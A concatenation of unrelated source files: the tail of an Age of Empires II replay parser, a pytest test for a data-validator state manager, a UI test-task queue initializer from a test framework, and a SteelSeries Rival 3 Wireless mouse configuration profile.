"queue_amount"/Byte, Padding(1), Array(lambda ctx: ctx.selected, "building_ids"/Int32ul) ) """DE Attack Move It's almost the same as Patrol. 10 X-coordinates followed by 10 Y-coordinates First of each is popped off for consistency with other actions """ de_attackmove = "de_attackmove"/Struct( "selected"/Byte, "waypoints"/Int16ul, "x"/Float32l, Array(9, "x_more"/Float32l), "y"/Float32l, Array(9, "y_more"/Float32l), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul), ) postgame = "achievements"/Struct( Padding(3), "scenario_filename"/String(32, padchar=b'\x00', trimdir='right', encoding='latin1'), "player_num"/Byte, "computer_num"/Byte, Padding(2), Peek("duration_int"/Int32ul), TimeSecAdapter("duration"/Int32ul), "cheats"/Flag, "complete"/Flag, Padding(2), "db_checksum"/Int32ul, "code_checksum"/Int32ul, "version"/Float32l, "map_size"/Byte, "map_id"/Byte, "population"/Int16ul, Peek("victory_type_id"/Byte), VictoryEnum("victory_type"/Byte), Peek("starting_age_id"/Byte), AgeEnum("starting_age"/Byte), Peek("starting_resources_id"/Byte), ResourceLevelEnum("starting_resources"/Byte), "all_techs"/Flag, "random_positions"/Flag, RevealMapEnum("reveal_map"/Byte), "is_deathmatch"/Flag, "is_regicide"/Flag, "starting_units"/Byte, "lock_teams"/Flag, "lock_speed"/Flag, Padding(1), Array(lambda ctx: ctx.player_num, achievements), Padding(4), Array(lambda ctx: (8 - ctx.player_num) * 63, Padding(4)), ) de_autoscout = "de_autoscout"/Struct( "selected"/Byte, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) )
tests/system/test_state_manager.py
ajw0100/professional-services-data-validator
167
12730219
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest from data_validation import state_manager GCS_STATE_PATH = "gs://pso-kokoro-resources/state/" TEST_CONN_NAME = "example" TEST_CONN = { "source_type": "BigQuery", "project_id": "my-project", } def test_get_gcs_file_path(): manager = state_manager.StateManager(GCS_STATE_PATH) result_path = manager._get_gcs_file_path(GCS_STATE_PATH + "file/path/name.json") assert result_path == "state/file/path/name.json" def test_gcs_create_and_get_connection_config(): manager = state_manager.StateManager(GCS_STATE_PATH) manager.create_connection(TEST_CONN_NAME, TEST_CONN) config = manager.get_connection_config(TEST_CONN_NAME) assert config == TEST_CONN def test_list_connections(): manager = state_manager.StateManager(GCS_STATE_PATH) expected = set(["example", "my_bq_conn"]) connections = manager.list_connections() assert set(connections) == expected def test_create_invalid_gcs_path_raises(): # Unknown file paths will be created by the state manager files_directory = "gs://!!bucket!!/this/path/" with pytest.raises(ValueError, match=r"GCS Path Failure .*"): state_manager.StateManager(files_directory)
AutotestFramework/runfunc/ui_initial.py
yangjourney/sosotest
422
12730227
<gh_stars>100-1000 import logging import logging.handlers import socket,os,threading from core.const.Do import Do from core.const.GlobalConst import ExecStatus from core.tools.DBTool import DBTool from core.tools.TypeTool import TypeTool from runfunc.initial import init_logging from runfunc.ui_threadProcess import * from core.config.InitConfig import * import socket,traceback,os from core.tools.CommonFunc import * from allmodels_ui.UITestTask import UITestTask from threads.UITaskThread import UITaskThread from copy import deepcopy ########################################################################################################## ########################################################################################################## ########################################################################################################## uiTaskQueue = [] uiTaskCancelQueue = [] maxUITaskThreadNums = 7 #最大能并行的UI测试任务数量 maxWebThreadNums = 5 maxAndroidThreadNums = 3 maxIosThreadNums = 4 executingWebThreadNum = 0 #当前执行中的UI测试任务数量 executingIosThreadNum = 0 #当前执行中的UI测试任务数量 executingAndroidThreadNum = 0 #当前执行中的UI测试任务数量 executingUITaskThreadNum = 0 #当前执行中的UI测试任务数量 executintUITaskThreadDict = {} #当前活着的threadDict executintWebThreadDict = {} #当前活着的threadDict executintIosThreadDict = {} #当前活着的threadDict executintAndroidThreadDict = {} #当前活着的threadDict ########################################################################################################## ########################################################################################################## ########################################################################################################## def init_ui_task_queue(): db = DBTool().initGlobalDBConf() # DONE 初始化 taskrun {'do': 3, 'TaskExecuteId': '1'} colsStr = "id" tbName = "tb_ui_test_execute" whereStr = "execStatus = %d or execStatus = %d " % (ExecStatus.NOTRUN, ExecStatus.RUNNING) orderBy = "addTime asc" sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy) res = db.execute_sql(sql) #重置所有模拟器 mobileServer = db.execute_sql("UPDATE tb_ui_mobile_server SET STATUS = 0") db.release() logging.debug("init_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res)) if res == False: logging.error("init_ui_task_queue: 初始化任务执行队列失败!") return False if mobileServer == False: logging.error("init_ui_task_queue: 初始化模拟器状态失败!") return False for tRes in res: tmpData = {} tmpData[Do.KEY_DO] = Do.TYPE_UITASK_EXECUTE tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id'] uiTaskQueue.append(tmpData) logging.info("init_ui_task_queue: uiTaskQueue加入新data:%s 。来源表:%s" % (tmpData, tbName)) logging.info("init_ui_task_queue: uiTaskQueue:%s" % uiTaskQueue) logging.info("init_ui_task_queue: 初始化任务执行表完成uiTaskQueue:%s" % uiTaskQueue) def init_cancel_ui_task_queue(): db = DBTool().initGlobalDBConf() # DONE 初始化 taskrun {'do': 3, 'TaskExecuteId': '1'} colsStr = "id" tbName = "tb_ui_test_execute" whereStr = "execStatus = %d " % (ExecStatus.CANCELING) orderBy = "addTime asc" sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy) res = db.execute_sql(sql) db.release() logging.debug("init_cancel_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res)) if res == False: logging.error("init_cancel_ui_task_queue: 初始化任务执行队列失败!") return False for tRes in res: tmpData = {} tmpData[Do.KEY_DO] = Do.TYPE_UITASK_CANCEL tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id'] uiTaskCancelQueue.append(tmpData) logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue加入新data:%s 。来源表:%s" % (tmpData, tbName)) logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue:%s" % uiTaskCancelQueue) logging.info("init_cancel_ui_task_queue: 初始化任务执行表完成uiTaskCancelQueuee:%s" % uiTaskCancelQueue)
rivalcfg/devices/rival3_wireless.py
Clueninja/rivalcfg
604
12730234
<gh_stars>100-1000 from .. import usbhid profile = { "name": "SteelSeries Rival 3 Wireless", "models": [ { "name": "SteelSeries Rival 3 Wireless (2.4 GHz mode)", "vendor_id": 0x1038, "product_id": 0x1830, "endpoint": 3, }, ], "settings": { "sensitivity": { "label": "Sensibility presets", "description": "Set sensitivity preset (DPI)", "cli": ["-s", "--sensitivity"], "report_type": usbhid.HID_REPORT_TYPE_OUTPUT, "command": [0x20], "value_type": "multidpi_range", "input_range": [100, 18000, 100], "output_range": [0x00, 0xD6, 1.2], "dpi_length_byte": 2, "first_preset": 1, "count_mode": "number", "max_preset_count": 5, "default": "400, 800, 1200, 2400, 3200", }, "polling_rate": { "label": "Polling rate", "description": "Set polling rate (Hz)", "cli": ["-p", "--polling-rate"], "report_type": usbhid.HID_REPORT_TYPE_OUTPUT, "command": [0x17], "value_type": "choice", "choices": { 125: 0x03, 250: 0x02, 500: 0x01, 1000: 0x00, }, "default": 1000, }, "buttons_mapping": { "label": "Buttons mapping", "description": "Set the mapping of the buttons", "cli": ["-b", "--buttons"], "report_type": usbhid.HID_REPORT_TYPE_OUTPUT, "command": [0x19], "value_type": "buttons", # fmt: off "buttons": { "Button1": {"id": 0x01, "offset": 0x00, "default": "button1"}, "Button2": {"id": 0x02, "offset": 0x05, "default": "button2"}, "Button3": {"id": 0x03, "offset": 0x0A, "default": "button3"}, "Button4": {"id": 0x04, "offset": 0x0F, "default": "button4"}, "Button5": {"id": 0x05, "offset": 0x14, "default": "button5"}, "Button6": {"id": 0x06, "offset": 0x19, "default": "dpi"}, }, "button_field_length": 5, "button_disable": 0x00, "button_keyboard": 0x51, "button_multimedia": 0x61, "button_dpi_switch": 0x30, "button_scroll_up": 0x31, "button_scroll_down": 0x32, # fmt: on "default": "buttons(button1=button1; button2=button2; button3=button3; button4=button4; button5=button5; button6=dpi)", }, }, "battery_level": { "report_type": usbhid.HID_REPORT_TYPE_OUTPUT, "command": [0xAA, 0x01], "response_length": 3, "is_charging": lambda data: bool(data[2]), "level": lambda data: int(data[0]), }, "save_command": { "report_type": usbhid.HID_REPORT_TYPE_OUTPUT, "command": [0x09], }, }